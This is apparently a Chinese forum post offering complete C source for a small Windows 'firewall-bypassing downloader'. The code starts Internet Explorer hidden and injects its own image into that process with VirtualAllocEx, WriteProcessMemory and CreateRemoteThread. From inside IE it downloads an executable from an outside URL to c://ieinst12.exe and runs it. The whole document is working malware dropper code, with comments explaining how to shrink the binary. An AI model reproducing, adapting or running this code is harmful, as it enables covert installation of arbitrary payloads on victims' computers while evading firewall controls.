3k穿墙下载者VC源代码

#include <windows.h>  #pragma comment(lib,"user32.lib")  #pragma comment(lib,"kernel32.lib")  //#pragma comment(linker, "/OPT:NOWIN98")   //取消这几行的注释，编译出的文件只有2K大小  //#pragma comment(linker, "/merge:.data=.text")     //#pragma comment(linker, "/merge:.rdata=.text")     //#pragma comment(linker, "/align:0x200")  #pragma comment(linker, "/ENTRY:main")     #pragma comment(linker, "/subsystem:windows")  #pragma comment(linker, "/BASE:0x13150000")          HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );//动态加载shell32.dll中的ShellExecuteA函数     DWORD(WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//动态加载Urlmon.dll中的UrlDownloadToFileA函数     HANDLE processhandle;     DWORD pid;     HINSTANCE hshell,hurlmon;  void download() //注入使用的下载函数  {     hshell=LoadLibrary("Shell32.dll");     hurlmon=LoadLibrary("urlmon.dll");     (FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");     (FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");     DOWNFILE(NULL,"http://www.xxxxxxx.cn/en/notepad.exe","c://ieinst12.exe",0, NULL);     SHELLRUN(0,"open","c://ieinst12.exe",NULL,NULL,5);     ExitProcess(0);  };       void main() //主函数  {         //1.得到IE路径,并运行     char iename[MAX_PATH],iepath[MAX_PATH];     ZeroMemory(iename,sizeof(iename));     ZeroMemory(iepath,sizeof(iepath));     GetWindowsDirectory(iepath,MAX_PATH);     strncpy(iename,iepath,3);     strcat(iename,"program files//Internet Explorer//IEXPLORE.EXE");     //strcat(iename,"windows//notepad.EXE");     WinExec(iename,SW_HIDE);     Sleep(500);     //2.得到 IE process handle     HWND htemp;     htemp=FindWindow("IEFrame",NULL);     GetWindowThreadProcessId(htemp,&pid);     processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);          //3.分配内存     HMODULE Module;     LPVOID NewModule;     DWORD Size;     LPDWORD lpimagesize;     Module = GetModuleHandle(NULL);//进程映像的基址     //得到内存镜像大小     _asm     {         push eax;         push ebx;         mov ebx,Module;         mov eax,[ebx+0x3c];         lea eax,[ebx+eax+0x50];             mov eax,[eax]         mov lpimagesize,eax;         pop ebx;         pop eax;     };     Size=(DWORD)lpimagesize;     NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//确定起始基址和内存映像基址的位置     //4.写内存，创建线程     WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);//写数据     LPTHREAD_START_ROUTINE entrypoint;     __asm     {         push eax;         lea eax,download;         mov entrypoint,eax;         pop eax     }          CreateRemoteThread(processhandle, NULL, 0, entrypoint, Module, 0, NULL);    //建立远程线程,并运行          //5.关闭对象     CloseHandle(processhandle);     return;  }